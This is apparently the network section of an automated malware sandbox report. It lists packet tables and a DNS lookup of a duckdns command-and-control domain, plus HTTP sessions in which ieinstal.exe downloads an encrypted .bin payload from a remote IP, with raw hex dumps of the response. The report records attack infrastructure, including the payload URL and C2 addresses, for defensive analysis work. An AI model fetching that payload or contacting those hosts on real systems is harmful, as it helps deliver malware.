Nov 25, 2021 11:28:31.732733011 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732816935 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732825041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732896090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.733040094 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.784576893 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.784774065 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.784843922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.784941912 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.784976006 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.784982920 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.784993887 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.785121918 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.785130024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.785267115 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.836633921 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.856136084 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:31.895706892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:35.594556093 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:47.529328108 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:29:10.296793938 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:29:10.297719955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:29:10.403040886 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:29:11.383416891 CET	49805	80	192.168.11.20	103.167.84.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 11:26:40.206996918 CET	51299	53	192.168.11.20	1.1.1.1
Nov 25, 2021 11:26:40.315538883 CET	53	51299	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 11:26:40.206996918 CET	192.168.11.20	1.1.1.1	0x986	Standard query (0)	septnet.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 11:26:40.315538883 CET	1.1.1.1	192.168.11.20	0x986	No error (0)	septnet.duckdns.org		193.104.197.85	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

103.167.84.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49805	103.167.84.150	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 11:26:34.720074892 CET	28	OUT	GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 103.167.84.150 Cache-Control: no-cache
Nov 25, 2021 11:26:35.009077072 CET	29	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 10:26:38 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 Last-Modified: Wed, 24 Nov 2021 18:27:10 GMT ETag: "28240-5d18d018cabcd" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: 1a 28 20 db 91 2c bd f8 80 63 77 bc 30 a9 80 ac 09 32 33 ca 09 63 a2 54 21 de 48 da cf e2 f2 05 93 65 62 53 77 60 ea 6b 8a bf c6 af ac 70 3b 7d fe 4b 16 a3 4b e0 34 b2 cb c9 ff 2b 0c e3 8f 99 93 1a a8 2d 3f 62 4f d3 db 42 33 01 54 fe 12 ed 99 19 5c 08 5c 2b b2 9e 0b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 0c e8 96 46 6d d3 4b 13 5e a5 79 8e ab 83 e9 46 1f 84 e7 1c be c4 50 68 42 33 3c 1a 90 40 49 44 e6 0d 41 12 32 9b e2 7a 43 41 a3 29 37 39 d9 33 df 5a 12 53 22 a7 36 e1 01 a3 77 83 06 5d 65 58 11 a7 dd 24 67 67 03 c5 f1 8f a9 f7 0f 73 a9 9b b9 06 69 8a db 23 2f a8 1e 50 b2 a7 fb 3f 7f 61 89 1b 1d 85 94 2d b8 59 af c5 de 61 e5 e7 2d de 4c 44 d9 7e 0a f5 10 a9 75 da d3 d7 f3 de e7 04 50 74 a7 f9 ee 4f 41 a8 47 7c dd 52 66 f9 61 e9 e3 e3 2d eb 11 5a 17 25 7c 83 b1 f5 72 05 7c f2 3c bb 86 a6 e0 5e 44 32 55 90 d5 8d 20 38 c5 b7 be f2 ff db 5f b0 0b dc 4e c4 0e b4 12 53 3d 8b 8b c5 59 c9 fb 41 97 c5 07 bf c7 1f c5 74 0c 8e 07 f4 d3 e1 01 3a 78 d3 73 cd 25 fa 1c 05 08 75 0c 25 41 2e cd d6 8c 72 63 30 cb b6 51 d4 1e b9 d4 7c 4d d4 03 dc fe fb a3 4f 63 d4 46 72 eb 63 8a 91 25 06 c3 cf a2 12 77 4f 3b 6d 60 42 1c 30 2f 0d 44 75 69 fd 29 2d 4c 74 63 13 4d f6 db 18 f0 a7 db 88 31 85 da 9e 45 c5 9b 8a 51 87 30 19 cc c5 18 95 7c 1d 8e 26 e3 e0 41 a8 25 57 ca c7 1b 87 d1 f9 ba e7 dc 76 11 2c 12 4d ce d9 52 59 6f 7e 58 c3 e5 41 b0 bc 0b 5e 3d ba e6 17 11 12 a4 22 e3 46 96 69 1e 79 70 ba 76 5c b5 38 46 c4 5c ff 92 d6 94 80 2b 8d 08 92 b8 1e 33 0b 30 d8 a2 36 00 c1 aa 4e a0 c3 e1 2d 28 62 0b 24 39 31 b8 54 8e 1f 4d 31 38 9a 7f 01 2f 13 28 15 86 3f 54 70 1e 9c 0f db aa 3b 65 e0 55 13 f0 85 31 6b 3a b6 df 6c 30 03 ed 44 ab 8f 6b ff 0a 5a ac 54 3d 2e 84 7b 53 bc 32 1b df 46 62 41 c4 c3 67 f1 65 88 28 0c 38 e8 4a 62 d5 38 97 a0 6d c7 f8 38 c0 69 42 8e f4 2c 6d a1 bb cf dc b4 cb bb 9f 66 b1 69 52 c4 5b 4b 7f fb 79 00 3d 03 f3 93 e7 d1 32 1a 8c d2 8c 8a 81 62 11 6b 97 9c 4b 1b 05 b4 0b ae 33 eb a3 3f 85 59 b1 fc 6a 4a 3b 7e d9 c4 61 bf 55 bc ef c7 1d d2 f9 bc ce c4 13 50 98 4e d1 75 12 b9 f8 3a 28 47 9f 91 73 8b 6b 14 b0 49 5f f6 59 db be d6 91 f3 48 2b 52 54 bb 9e 70 28 dc 1b 04 47 bd 6e 83 fb b9 cb bd a0 a6 8b 2d 6c 0b 37 bb 4f 27 5c 24 ff 94 85 a9 25 90 14 20 45 aa 82 fd 03 f0 38 e6 5d fb ff a0 5b 31 6f d8 c5 82 ee 1f 84 69 6c e4 e8 87 3b 18 bb 8c 49 01 4f 54 3c 72 28 b6 dd 05 b1 df e9 05 44 d0 0d 69 81 43 d5 45 50 88 fb b9 75 90 a8 57 c7 ac 6c 42 b1 22 9b 43 7e dc 9a e9 c2 3a ff 32 76 9d 2e f3 19 d0 68 ad 37 1b 9c 31 43 a9 31 66 fe e1 8f 20 e3 36 b4 35 b7 a0 7b 43 6f f1 56 9a d9 bf 06 39 9e 09 9e c9 b8 90 09 4b 0e e2 16 3e 51 ab e2 24 ca b7 e6 e4 f0 4a d7 3a d8 3e ff c6 2a d6 ee 12 26 25 9d d5 5a 7e e5 02 cb 69 24 c5 c5 73 43 f2 a3 9b 3b 43 a0 18 69 b3 e4 ec d0 2b 7e 99 90 2b 77 66 54 60 e7 98 49 d2 39 1b f1 84 2b d8 6f 59 54 83 38 8d 07 21 ed ea 2b 87 43 3a 50 6c 21 8a de 40 38 2d 3c 62 4f d3 df 42 33 01 ab 01 12 ed 21 19 5c 08 5c 2b b2 9e 4b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 8c e8 96 46 63 cc f1 1d 5e 11 70 43 8a 3b e8 0a d2 a5 b3 74 d7 b7 70 18 30 5c 5b 68 f1 2d 69 27 87 63 2f 7d 46 bb 80 1f 63 33 d6 47 17 50 b7 13 9b Data Ascii: ( ,cw023cT!HebSw`kp;}KK4+-?bOB3T\\+QjX,P2JpY9+FmK^yFPhB3<@IDA2zCA)793ZS"6w]eX$ggsi#/P?a-Ya-LD~uPtOAG\|Rfa-Z%\|r\|<^D2U 8_NS=YAt:xs%u%A.rc0Q\|MOcFrc%wO;m`B0/Dui)-LtcM1EQ0\|&A%Wv,MRYo~XA^="Fiypv\8F\+306N-(b$91TM18/(?Tp;eU1k:l0DkZT=.{S2FbAge(8Jb8m8iB,mfiR[Ky=2bkK3?YjJ;~aUPNu:(GskI_YH+RTp(Gn-l7O'\$% E8][1oil;IOT<r(DiCEPuWlB"C~:2v.h71C1f 65{CoV9K>Q$J:>*&%Z~i$sC;Ci+~+wfT`I9+oYT8!+C:Pl!@8-<bOB3!\\+KQjX,P2JpY9+Fc^pC;tp0\[h-i'c/}Fc3GP
Nov 25, 2021 11:26:35.009140015 CET	30	IN	Data Raw: 15 41 73 4f c8 52 84 2f ae 7a 89 22 5d 65 58 11 a7 dd 24 37 22 03 c5 bd d8 fd c6 92 89 8f d1 7e 03 2d a2 99 23 d0 57 01 af 7b a0 d4 9e 99 3a 89 f5 70 a9 94 55 7f 5d 8b 0d 3c 23 c8 2b 4e f2 4c 54 52 4b da 60 50 a9 b2 df a3 64 b1 ce e7 04 50 76 60 Data Ascii: AsOR/z"]eX$7"~-#W{:pU]<#+NLTRK`PdPv`:F\|RMZ-j9XY&V~sD+J$m]1_Uh3fY\|6\'g%q!a%Q>M+NcFGy"F6Idr/@Qk-Hxq
Nov 25, 2021 11:26:35.009188890 CET	32	IN	Data Raw: b1 37 50 e1 a8 ef b9 7f 5d 8d 3d 03 f3 e0 21 55 56 94 bc 92 a2 bf 23 87 41 85 97 9c a3 2d c3 30 2f 3e 30 eb a3 58 43 dd 95 0d 68 4a 3b 7e 1e c0 45 45 7c fe ef b9 5f 3a 7f 5d ff 04 b0 b6 d9 ee bc 16 12 30 10 13 24 ca 1b 95 bc 8b 6b 1a 77 0d 7b 86 Data Ascii: 7P]=!UV#A-0/>0XChJ;~EE\|_:]0$kw{_l?0)=S@5]$m-p]r4kE;mn<KT<\|UgAP<QG*C~]>2v=Y,;%B1 _kBot]\9
Nov 25, 2021 11:26:35.009236097 CET	33	IN	Data Raw: b0 0f 56 a0 25 aa 7a 89 ca f6 b9 59 11 22 1d ad f1 2d 87 a9 b4 8e ae 77 32 0b 62 ca 2d 86 61 8e db 23 ac 6b fc 97 f8 80 e0 3a 7f 78 89 94 5b a1 98 92 fc 7d a7 ac de 61 c8 04 69 fa 48 53 d9 7e 0a 5c 0e 8d 9d 8c 9c d6 f3 43 61 00 52 76 a7 3e ae 6b Data Ascii: V%zY"-w2b-a#k:x[}aiHS~\CaRv>kQD\|&i-,UN"\|\|cn_d 9\8{^-BO\?](#H(B&Ehc%=X!t%AQ0X<ksGr)wO;$f7/DuBucX$]
Nov 25, 2021 11:26:35.298674107 CET	35	IN	Data Raw: 4d 5f 6f 97 b8 5e 01 3d ea cf 97 e7 d1 fb 06 98 7a f2 cb e4 03 8c 25 93 9c a3 cf 01 90 17 a8 30 eb 4b 73 52 58 b1 19 a8 c3 fd 71 5d dd 65 bf 55 7b ab e3 0d d6 bb bc fe 8d 79 06 f1 af 02 32 c2 bd 54 37 ef 03 bb b9 71 8b 6b 1a 77 0d 7b 86 5c db be Data Ascii: M_o^=z%0KsRXq]eU{y2T7qkw{\lX^4z*ad7O%1]<K1;(;K%KS<r(?!YcD]aCw&sYs.2f.zedjs?5C1'6=fV@>
Nov 25, 2021 11:26:35.298763037 CET	36	IN	Data Raw: c0 23 8e 7a 86 94 31 41 78 9a db f9 38 be 1e 27 4c d1 aa aa 1f 6e f5 9c 3a 3d c6 1c 93 1c 27 0b b8 d9 50 bc 4c 0b 67 7d 78 00 01 3b 6d 0c 61 b8 59 46 c8 21 9e 37 4e 69 fa 6d 1d 50 12 2e d1 9b e5 51 d6 1a eb d7 47 a3 20 58 ff eb dd f2 a7 10 43 b9 Data Ascii: #z1Ax8'Ln:='PLg}x;maYF!7NimP.QG XCVFajxN\|cO_ 7v^@d;Y/;xV-$v{IurDP~XIrkk]rV+%3k?K))Pg 12>
Nov 25, 2021 11:26:35.298827887 CET	37	IN	Data Raw: f2 bf 5d 58 b4 47 d7 87 6c 92 7e 97 20 b6 7e e2 e5 03 ec 66 b3 90 64 4c 21 bc 0c 82 72 eb 64 6f a1 5d b5 9e 68 4a b2 62 fd 4d 25 9b 45 54 83 3a 1d d2 3c 7c 80 10 b4 66 d9 2a 33 52 36 f5 dd 6b 0c 43 16 b5 54 63 6f e0 b0 49 19 09 1f ff fa ed a1 fc Data Ascii: ]XGl~ ~fdL!rdo]hJbM%ET:<\|f3R6kCTcoID@00HC-lK'x0PuK!-H\IOT6.A`iC^tus/^Bg9bZ*<7w 5B& )gJ>T
Nov 25, 2021 11:26:35.298888922 CET	39	IN	Data Raw: bb 64 32 52 d3 95 98 4f d2 92 3b af 03 03 ff 8e a1 41 a1 05 d5 e9 14 06 af c8 db 10 13 05 fe ee fe a4 c3 02 f0 78 4b 5f 1f 0c ee 51 33 12 a7 24 11 6e 7e 2a ec 31 54 5b 6f 52 a7 d5 d4 eb 75 d5 25 eb 4e ce 21 46 50 fd 9b 44 ea 9d 03 a8 75 40 70 52 Data Ascii: d2RO;AxK_Q3$n~*1T[oRu%N!FPDu@pRa`.">0OHUFxc=(t3V{NBL:GF0AQAY^FcL%5b5OQBr/>ym(Z+zSN
Nov 25, 2021 11:26:35.298950911 CET	40	IN	Data Raw: 25 3d 03 f3 6c e8 67 a9 2b 74 a1 e5 ef 6e 17 f8 0a 51 de a3 83 59 90 0f 2f d2 eb a3 d4 85 56 07 43 59 9a b0 6a 44 c4 a7 fd 55 3d 0d c7 e2 d2 b9 8d 2e 8d ff aa bb 2d 7f fc 0a 31 02 3b a1 85 5e 5b 60 03 3d 17 39 8b 9e 68 53 53 e8 d8 12 37 50 70 0c Data Ascii: %=lg+tnQY/VCYjDU=.-1;^[`=9hSS7Pp]%H@yH78GHru%ta6Fpa!^4cR2<r(k]V!T!6]iMj":Ec88O)>Qt\|6(y7hK#&
Nov 25, 2021 11:26:35.299012899 CET	41	IN	Data Raw: a2 65 58 11 d2 04 15 ec 13 d1 f4 7d bf 58 7a 01 0e ea 10 30 d1 ea 7d b8 a0 ce af 2d ad 34 65 23 c1 f0 30 8c 2c e2 0c 43 d6 59 5e 7c 52 53 29 ce f2 d0 57 9b d7 38 79 d9 2a 9f e1 72 eb 6e 5e 24 4d 06 03 83 89 2f 38 aa 7e bc 2b a3 7d 0e b7 6b 17 e2 Data Ascii: eX}Xz0}-4e#0,CY^\|RS)W8yrn^$M/8~+}kbe}~z^' LO^7Y"yRz]:Q0X$#rkbvc3'40I`qj)-\|<(,+Iau
Nov 25, 2021 11:26:35.299076080 CET	43	IN	Data Raw: ff 10 a3 f5 5a 1e 35 90 49 37 60 d8 11 48 1a e0 87 01 34 74 b2 ad 30 eb a3 96 86 59 b1 9c 9b e0 b6 3a fd cd e8 66 7c 61 62 9b 39 de 30 7b 77 de 14 c9 0e 86 56 47 ec 46 ab 7a ab ba 60 c5 77 4d 2f 31 b4 74 b4 71 d0 9f 9a da 1a bf 6c 03 db 55 38 5a Data Ascii: Z5I7`H4t0Y:f\|ab90{wVGFz`wM/1tqlU8Z`sDi65LrXp!evw&lkx<(6Y<r OLH^:vc,?B!whMf\?kmAS$J#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49808	103.167.84.150	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 11:28:09.684592009 CET	326	OUT	GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 103.167.84.150 Cache-Control: no-cache
Nov 25, 2021 11:28:09.965739012 CET	327	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 10:28:13 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 Last-Modified: Wed, 24 Nov 2021 18:27:10 GMT ETag: "28240-5d18d018cabcd" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: 1a 28 20 db 91 2c bd f8 80 63 77 bc 30 a9 80 ac 09 32 33 ca 09 63 a2 54 21 de 48 da cf e2 f2 05 93 65 62 53 77 60 ea 6b 8a bf c6 af ac 70 3b 7d fe 4b 16 a3 4b e0 34 b2 cb c9 ff 2b 0c e3 8f 99 93 1a a8 2d 3f 62 4f d3 db 42 33 01 54 fe 12 ed 99 19 5c 08 5c 2b b2 9e 0b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 0c e8 96 46 6d d3 4b 13 5e a5 79 8e ab 83 e9 46 1f 84 e7 1c be c4 50 68 42 33 3c 1a 90 40 49 44 e6 0d 41 12 32 9b e2 7a 43 41 a3 29 37 39 d9 33 df 5a 12 53 22 a7 36 e1 01 a3 77 83 06 5d 65 58 11 a7 dd 24 67 67 03 c5 f1 8f a9 f7 0f 73 a9 9b b9 06 69 8a db 23 2f a8 1e 50 b2 a7 fb 3f 7f 61 89 1b 1d 85 94 2d b8 59 af c5 de 61 e5 e7 2d de 4c 44 d9 7e 0a f5 10 a9 75 da d3 d7 f3 de e7 04 50 74 a7 f9 ee 4f 41 a8 47 7c dd 52 66 f9 61 e9 e3 e3 2d eb 11 5a 17 25 7c 83 b1 f5 72 05 7c f2 3c bb 86 a6 e0 5e 44 32 55 90 d5 8d 20 38 c5 b7 be f2 ff db 5f b0 0b dc 4e c4 0e b4 12 53 3d 8b 8b c5 59 c9 fb 41 97 c5 07 bf c7 1f c5 74 0c 8e 07 f4 d3 e1 01 3a 78 d3 73 cd 25 fa 1c 05 08 75 0c 25 41 2e cd d6 8c 72 63 30 cb b6 51 d4 1e b9 d4 7c 4d d4 03 dc fe fb a3 4f 63 d4 46 72 eb 63 8a 91 25 06 c3 cf a2 12 77 4f 3b 6d 60 42 1c 30 2f 0d 44 75 69 fd 29 2d 4c 74 63 13 4d f6 db 18 f0 a7 db 88 31 85 da 9e 45 c5 9b 8a 51 87 30 19 cc c5 18 95 7c 1d 8e 26 e3 e0 41 a8 25 57 ca c7 1b 87 d1 f9 ba e7 dc 76 11 2c 12 4d ce d9 52 59 6f 7e 58 c3 e5 41 b0 bc 0b 5e 3d ba e6 17 11 12 a4 22 e3 46 96 69 1e 79 70 ba 76 5c b5 38 46 c4 5c ff 92 d6 94 80 2b 8d 08 92 b8 1e 33 0b 30 d8 a2 36 00 c1 aa 4e a0 c3 e1 2d 28 62 0b 24 39 31 b8 54 8e 1f 4d 31 38 9a 7f 01 2f 13 28 15 86 3f 54 70 1e 9c 0f db aa 3b 65 e0 55 13 f0 85 31 6b 3a b6 df 6c 30 03 ed 44 ab 8f 6b ff 0a 5a ac 54 3d 2e 84 7b 53 bc 32 1b df 46 62 41 c4 c3 67 f1 65 88 28 0c 38 e8 4a 62 d5 38 97 a0 6d c7 f8 38 c0 69 42 8e f4 2c 6d a1 bb cf dc b4 cb bb 9f 66 b1 69 52 c4 5b 4b 7f fb 79 00 3d 03 f3 93 e7 d1 32 1a 8c d2 8c 8a 81 62 11 6b 97 9c 4b 1b 05 b4 0b ae 33 eb a3 3f 85 59 b1 fc 6a 4a 3b 7e d9 c4 61 bf 55 bc ef c7 1d d2 f9 bc ce c4 13 50 98 4e d1 75 12 b9 f8 3a 28 47 9f 91 73 8b 6b 14 b0 49 5f f6 59 db be d6 91 f3 48 2b 52 54 bb 9e 70 28 dc 1b 04 47 bd 6e 83 fb b9 cb bd a0 a6 8b 2d 6c 0b 37 bb 4f 27 5c 24 ff 94 85 a9 25 90 14 20 45 aa 82 fd 03 f0 38 e6 5d fb ff a0 5b 31 6f d8 c5 82 ee 1f 84 69 6c e4 e8 87 3b 18 bb 8c 49 01 4f 54 3c 72 28 b6 dd 05 b1 df e9 05 44 d0 0d 69 81 43 d5 45 50 88 fb b9 75 90 a8 57 c7 ac 6c 42 b1 22 9b 43 7e dc 9a e9 c2 3a ff 32 76 9d 2e f3 19 d0 68 ad 37 1b 9c 31 43 a9 31 66 fe e1 8f 20 e3 36 b4 35 b7 a0 7b 43 6f f1 56 9a d9 bf 06 39 9e 09 9e c9 b8 90 09 4b 0e e2 16 3e 51 ab e2 24 ca b7 e6 e4 f0 4a d7 3a d8 3e ff c6 2a d6 ee 12 26 25 9d d5 5a 7e e5 02 cb 69 24 c5 c5 73 43 f2 a3 9b 3b 43 a0 18 69 b3 e4 ec d0 2b 7e 99 90 2b 77 66 54 60 e7 98 49 d2 39 1b f1 84 2b d8 6f 59 54 83 38 8d 07 21 ed ea 2b 87 43 3a 50 6c 21 8a de 40 38 2d 3c 62 4f d3 df 42 33 01 ab 01 12 ed 21 19 5c 08 5c 2b b2 9e 4b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 8c e8 96 46 63 cc f1 1d 5e 11 70 43 8a 3b e8 0a d2 a5 b3 74 d7 b7 70 18 30 5c 5b 68 f1 2d 69 27 87 63 2f 7d 46 bb 80 1f 63 33 d6 47 17 50 b7 13 9b Data Ascii: ( ,cw023cT!HebSw`kp;}KK4+-?bOB3T\\+QjX,P2JpY9+FmK^yFPhB3<@IDA2zCA)793ZS"6w]eX$ggsi#/P?a-Ya-LD~uPtOAG\|Rfa-Z%\|r\|<^D2U 8_NS=YAt:xs%u%A.rc0Q\|MOcFrc%wO;m`B0/Dui)-LtcM1EQ0\|&A%Wv,MRYo~XA^="Fiypv\8F\+306N-(b$91TM18/(?Tp;eU1k:l0DkZT=.{S2FbAge(8Jb8m8iB,mfiR[Ky=2bkK3?YjJ;~aUPNu:(GskI_YH+RTp(Gn-l7O'\$% E8][1oil;IOT<r(DiCEPuWlB"C~:2v.h71C1f 65{CoV9K>Q$J:>*&%Z~i$sC;Ci+~+wfT`I9+oYT8!+C:Pl!@8-<bOB3!\\+KQjX,P2JpY9+Fc^pC;tp0\[h-i'c/}Fc3GP
Nov 25, 2021 11:28:09.965801001 CET	329	IN	Data Raw: 15 41 73 4f c8 52 84 2f ae 7a 89 22 5d 65 58 11 a7 dd 24 37 22 03 c5 bd d8 fd c6 92 89 8f d1 7e 03 2d a2 99 23 d0 57 01 af 7b a0 d4 9e 99 3a 89 f5 70 a9 94 55 7f 5d 8b 0d 3c 23 c8 2b 4e f2 4c 54 52 4b da 60 50 a9 b2 df a3 64 b1 ce e7 04 50 76 60 Data Ascii: AsOR/z"]eX$7"~-#W{:pU]<#+NLTRK`PdPv`:F\|RMZ-j9XY&V~sD+J$m]1_Uh3fY\|6\'g%q!a%Q>M+NcFGy"F6Idr/@Qk-Hxq
Nov 25, 2021 11:28:09.965848923 CET	330	IN	Data Raw: b1 37 50 e1 a8 ef b9 7f 5d 8d 3d 03 f3 e0 21 55 56 94 bc 92 a2 bf 23 87 41 85 97 9c a3 2d c3 30 2f 3e 30 eb a3 58 43 dd 95 0d 68 4a 3b 7e 1e c0 45 45 7c fe ef b9 5f 3a 7f 5d ff 04 b0 b6 d9 ee bc 16 12 30 10 13 24 ca 1b 95 bc 8b 6b 1a 77 0d 7b 86 Data Ascii: 7P]=!UV#A-0/>0XChJ;~EE\|_:]0$kw{_l?0)=S@5]$m-p]r4kE;mn<KT<\|UgAP<QG*C~]>2v=Y,;%B1 _kBot]\9
Nov 25, 2021 11:28:09.965897083 CET	331	IN	Data Raw: b0 0f 56 a0 25 aa 7a 89 ca f6 b9 59 11 22 1d ad f1 2d 87 a9 b4 8e ae 77 32 0b 62 ca 2d 86 61 8e db 23 ac 6b fc 97 f8 80 e0 3a 7f 78 89 94 5b a1 98 92 fc 7d a7 ac de 61 c8 04 69 fa 48 53 d9 7e 0a 5c 0e 8d 9d 8c 9c d6 f3 43 61 00 52 76 a7 3e ae 6b Data Ascii: V%zY"-w2b-a#k:x[}aiHS~\CaRv>kQD\|&i-,UN"\|\|cn_d 9\8{^-BO\?](#H(B&Ehc%=X!t%AQ0X<ksGr)wO;$f7/DuBucX$]
Nov 25, 2021 11:28:10.247102022 CET	333	IN	Data Raw: 4d 5f 6f 97 b8 5e 01 3d ea cf 97 e7 d1 fb 06 98 7a f2 cb e4 03 8c 25 93 9c a3 cf 01 90 17 a8 30 eb 4b 73 52 58 b1 19 a8 c3 fd 71 5d dd 65 bf 55 7b ab e3 0d d6 bb bc fe 8d 79 06 f1 af 02 32 c2 bd 54 37 ef 03 bb b9 71 8b 6b 1a 77 0d 7b 86 5c db be Data Ascii: M_o^=z%0KsRXq]eU{y2T7qkw{\lX^4z*ad7O%1]<K1;(;K%KS<r(?!YcD]aCw&sYs.2f.zedjs?5C1'6=fV@>
Nov 25, 2021 11:28:10.247163057 CET	335	IN	Data Raw: c0 23 8e 7a 86 94 31 41 78 9a db f9 38 be 1e 27 4c d1 aa aa 1f 6e f5 9c 3a 3d c6 1c 93 1c 27 0b b8 d9 50 bc 4c 0b 67 7d 78 00 01 3b 6d 0c 61 b8 59 46 c8 21 9e 37 4e 69 fa 6d 1d 50 12 2e d1 9b e5 51 d6 1a eb d7 47 a3 20 58 ff eb dd f2 a7 10 43 b9 Data Ascii: #z1Ax8'Ln:='PLg}x;maYF!7NimP.QG XCVFajxN\|cO_ 7v^@d;Y/;xV-$v{IurDP~XIrkk]rV+%3k?K))Pg 12>
Nov 25, 2021 11:28:10.247211933 CET	336	IN	Data Raw: f2 bf 5d 58 b4 47 d7 87 6c 92 7e 97 20 b6 7e e2 e5 03 ec 66 b3 90 64 4c 21 bc 0c 82 72 eb 64 6f a1 5d b5 9e 68 4a b2 62 fd 4d 25 9b 45 54 83 3a 1d d2 3c 7c 80 10 b4 66 d9 2a 33 52 36 f5 dd 6b 0c 43 16 b5 54 63 6f e0 b0 49 19 09 1f ff fa ed a1 fc Data Ascii: ]XGl~ ~fdL!rdo]hJbM%ET:<\|f3R6kCTcoID@00HC-lK'x0PuK!-H\IOT6.A`iC^tus/^Bg9bZ*<7w 5B& )gJ>T
Nov 25, 2021 11:28:10.247258902 CET	337	IN	Data Raw: bb 64 32 52 d3 95 98 4f d2 92 3b af 03 03 ff 8e a1 41 a1 05 d5 e9 14 06 af c8 db 10 13 05 fe ee fe a4 c3 02 f0 78 4b 5f 1f 0c ee 51 33 12 a7 24 11 6e 7e 2a ec 31 54 5b 6f 52 a7 d5 d4 eb 75 d5 25 eb 4e ce 21 46 50 fd 9b 44 ea 9d 03 a8 75 40 70 52 Data Ascii: d2RO;AxK_Q3$n~*1T[oRu%N!FPDu@pRa`.">0OHUFxc=(t3V{NBL:GF0AQAY^FcL%5b5OQBr/>ym(Z+zSN
Nov 25, 2021 11:28:10.247306108 CET	339	IN	Data Raw: 25 3d 03 f3 6c e8 67 a9 2b 74 a1 e5 ef 6e 17 f8 0a 51 de a3 83 59 90 0f 2f d2 eb a3 d4 85 56 07 43 59 9a b0 6a 44 c4 a7 fd 55 3d 0d c7 e2 d2 b9 8d 2e 8d ff aa bb 2d 7f fc 0a 31 02 3b a1 85 5e 5b 60 03 3d 17 39 8b 9e 68 53 53 e8 d8 12 37 50 70 0c Data Ascii: %=lg+tnQY/VCYjDU=.-1;^[`=9hSS7Pp]%H@yH78GHru%ta6Fpa!^4cR2<r(k]V!T!6]iMj":Ec88O)>Qt\|6(y7hK#&
Nov 25, 2021 11:28:10.247353077 CET	340	IN	Data Raw: a2 65 58 11 d2 04 15 ec 13 d1 f4 7d bf 58 7a 01 0e ea 10 30 d1 ea 7d b8 a0 ce af 2d ad 34 65 23 c1 f0 30 8c 2c e2 0c 43 d6 59 5e 7c 52 53 29 ce f2 d0 57 9b d7 38 79 d9 2a 9f e1 72 eb 6e 5e 24 4d 06 03 83 89 2f 38 aa 7e bc 2b a3 7d 0e b7 6b 17 e2 Data Ascii: eX}Xz0}-4e#0,CY^\|RS)W8yrn^$M/8~+}kbe}~z^' LO^7Y"yRz]:Q0X$#rkbvc3'40I`qj)-\|<(,+Iau
